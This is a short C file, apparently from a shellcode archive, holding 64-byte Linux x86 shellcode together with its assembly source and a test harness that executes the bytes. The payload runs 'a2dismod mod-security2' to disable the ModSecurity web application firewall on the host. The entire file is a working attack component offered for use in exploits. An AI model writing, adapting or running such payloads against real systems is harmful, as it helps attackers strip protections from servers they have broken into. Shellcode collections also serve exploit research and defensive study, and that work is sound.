/* sekfault@shellcode.com.ar - Goodfellas Security Research Team - 2010
 * /usr/sbin/a2dismod mod-security2 - disable modsecurity
 * 64 bytes
 *__asm__(
 *                "xor %eax,%eax \n"
 *                 "push %eax \n"
 *                 "cdq \n"
 *                 "push $0x646f6d73 \n"
 *                 "push $0x69643261 \n"
 *                 "push $0x2f6e6962 \n"
 *                 "push $0x732f7273 \n"
 *                 "push $0x752f2f2f \n"
 *                 "mov %esp,%ebx \n"
 *                 "push $0x32 \n"
 *                 "push $0x79746972 \n"
 *                 "push $0x75636573 \n"
 *                 "push $0x2d646f6d \n"
 *                 "mov %esp,%ecx \n"
 *                 "xor %edx,%edx \n"
 *                 "mov $0xb,%al \n"
 *                 "push %edx \n"
 *                 "push %ecx \n"
 *                 "push %ebx \n"
 *                 "mov %esp,%ecx \n"
 *                 "mov %esp,%edx \n"
 *                 "int $0x80 \n"
                   );
 */
char shellcode[]="\x31\xc0\x50\x99\x68\x73\x6d\x6f\x64\x68\x61\x32\x64\x69\x68\x62\x69\x6e\x2f\x68\x73\x72\x2f\x73\x68\x2f\x2f\x2f\x75\x89\xe3\x6a\x32\x68\x72\x69\x74\x79\x68\x73\x65\x63\x75\x68\x6d\x6f\x64\x2d\x89\xe1\x31\xd2\xb0\x0b\x52\x51\x53\x89\xe1\x89\xe2\xcd\x80";
 
int main()
{
        (*(void(*)())shellcode)();
        return 0;
}